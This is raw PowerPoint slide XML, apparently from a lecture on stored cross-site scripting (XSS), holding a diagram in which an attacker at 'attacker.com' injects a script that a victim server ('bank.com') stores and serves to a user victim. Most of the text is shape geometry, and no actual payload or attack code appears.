            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="364489" h="365125">
                <a:moveTo>
                  <a:pt x="174796" y="364896"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="126596" y="356257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82385" y="335200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46496" y="304337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20053" y="265856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4179" y="221946"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="174796"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8639" y="126595"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29695" y="82385"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60558" y="46496"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="99040" y="20052"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142950" y="4179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="190099" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="238300" y="8639"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="300562" y="43243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="344843" y="99039"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="364400" y="167534"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="363833" y="203150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="335200" y="282510"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="304337" y="318399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265856" y="344843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="221946" y="360716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="174796" y="364896"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="object 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2084502" y="4086339"/>
            <a:ext cx="364490" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="364489" h="365125">
                <a:moveTo>
                  <a:pt x="8639" y="126595"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="29695" y="82385"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60558" y="46496"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="99040" y="20052"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142950" y="4179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="190099" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="238300" y="8639"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="300562" y="43243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="344843" y="99039"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="364400" y="167534"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="363833" y="203150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="356257" y="238300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="335200" y="282510"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="304337" y="318399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265856" y="344843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="221946" y="360716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="174796" y="364896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="126596" y="356257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82385" y="335200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46496" y="304337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20053" y="265856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4179" y="221946"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="174796"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8639" y="126595"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12699">
            <a:solidFill>
              <a:srgbClr val="40458C"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="object 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1020000">
            <a:off x="2148926" y="4140789"/>
            <a:ext cx="291738" cy="254000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="object 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1845129" y="4356419"/>
            <a:ext cx="3260725" cy="1130300"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3260725" h="1130300">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3260270" y="1129980"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="28574">
            <a:solidFill>
              <a:srgbClr val="40458C"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="object 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1777782" y="4322292"/>
            <a:ext cx="122520" cy="89301"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId5" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="object 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5631877" y="1905000"/>
            <a:ext cx="2301433" cy="744601"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId6" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="object 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6477086" y="2752725"/>
            <a:ext cx="1905" cy="1704339"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1904" h="1704339">
                <a:moveTo>
                  <a:pt x="1501" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1703884"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="28574">
            <a:solidFill>
              <a:srgbClr val="B7C1EB"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="object 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6430691" y="4410159"/>
            <a:ext cx="92844" cy="116893"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId7" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="object 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6854825" y="3291840"/>
            <a:ext cx="1052830" cy="939800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700" marR="5080">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Inject  malicious  script</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="object 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6750050" y="2865438"/>
            <a:ext cx="365125" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="365125" h="365125">
                <a:moveTo>
                  <a:pt x="0" y="182562"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6521" y="134030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24925" y="90419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53471" y="53471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90419" y="24925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134030" y="6521"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182562" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="252426" y="13896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311653" y="53471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="351228" y="112698"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="365124" y="182562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="358603" y="231094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="340199" y="274705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311653" y="311653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274705" y="340199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="231094" y="358603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182562" y="365124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134030" y="358603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90419" y="340199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53471" y="311653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24925" y="274705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6521" y="231094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="182562"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12699">
            <a:solidFill>
              <a:srgbClr val="B7C1EB"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="object 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5541962" y="1539240"/>
            <a:ext cx="2522855" cy="330200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Attack</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-80" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Browser/Server</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="object 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6876546" y="2696972"/>
            <a:ext cx="1506220" cy="506095"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="600075">
              <a:lnSpc>
                <a:spcPts val="1650"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" spc="-5" dirty="0">
              <a:solidFill>
                <a:srgbClr val="B7C1EB"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPts val="2130"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr sz="2000" dirty="0">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="object 25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5483225" y="4587240"/>
            <a:ext cx="2863215" cy="2132330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Patsy/Victim</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="35"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr sz="3450">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="2147570" marR="5080">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Stores  the  script!</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marR="718185" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1060"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="408000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>bank.com</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Title 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B936CC37-8FBD-6D41-BEFD-DDEDED4F1740}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Stored XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC05F0AE-7A66-214D-BAA1-8E645DB18A0C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7085965" y="2696972"/>
            <a:ext cx="1448435" cy="259045"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CN" sz="1600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.com</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09600" y="2678536"/>
            <a:ext cx="1417532" cy="1264284"/>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5959475" y="4979988"/>
            <a:ext cx="1148521" cy="1406460"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId3" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5483225" y="4587240"/>
            <a:ext cx="2199640" cy="330200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-80" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Patsy/Victim</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="301625" y="3901440"/>
            <a:ext cx="1290955" cy="330200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>User</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-85" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Victim</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2274888" y="3962400"/>
            <a:ext cx="2738120" cy="958850"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2738120" h="958850">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2738079" y="958251"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="28574">
            <a:solidFill>
              <a:srgbClr val="B7C1EB"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
